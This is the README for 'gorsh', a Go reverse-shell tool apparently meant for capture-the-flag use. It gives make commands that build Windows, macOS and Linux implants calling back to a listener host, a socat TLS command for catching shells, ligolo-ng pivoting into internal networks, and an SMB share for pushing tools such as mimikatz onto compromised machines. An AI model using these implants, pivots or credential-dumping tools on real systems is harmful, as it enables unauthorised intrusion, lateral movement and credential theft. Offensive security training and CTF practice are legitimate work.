Home

Awesome

gorsh

[go]lang [r]everse [sh]ell

forthebadge forthebadge forthebadge forthebadge forthebadge

asciicast

Usage

Generate agents with:

# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
$ make {windows,macos,linux} LHOST=example.com LPORT=443

Generate the server with:

# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
$ make server LPORT=443

Gen everything with make all LHOST=example.com LPORT=443

Catching the shell

make listen LPORT=443

Tmux is powerful terminal multiplexer with robust session/windows/pane management. It works better at managing multiple reverse shells than most shell managers I've seen. The server binary creates a tmux session per host and a window per each reverse shell binary invocation. If you run the spawn command on a shell, a new window will open in the host's session, creating a "tab".

To catch a shell without gorsh-server and/or tmux, use:

socat -d -d OPENSSL-LISTEN:443,reuseaddr,cert=certs/server.pem,verify=0,fork READLINE

Features

Windows

Not Windows

Execute Assembly

Assemblies are gzipped and embedded within the implant. Since this is a CTF shell, I'm optimizing for ease of use and not tradecraft.

Ligolo-NG Tunnels

Agents have the ligolo client embedded. Run make start-ligolo to prepare interfaces and run ligolo-ng. From an agent, run pivot and a callback should land within the ligolo interface. Select the callback in ligolo and start routing. On your box, create a route to the remote network through the tun interface and all traffic to that destination will now egress through ligolo.

ip route add 172.16.43.0/24 dev ligolo`

File upload/download

Since this is a reverse shell, only sharing its stdin/out/err through a network socket, traditional methods of uploading and downloading file aren't available. There's a docker smb server to bridge that gap. Configure the directories to be shared in the Makefile, then run make start-smb. If you wish to see logs so you can monitor callbacks, use make smblogs. Windows implants understand UNC paths, so something like cp //myip/tools/mimikatz.exe . is possible.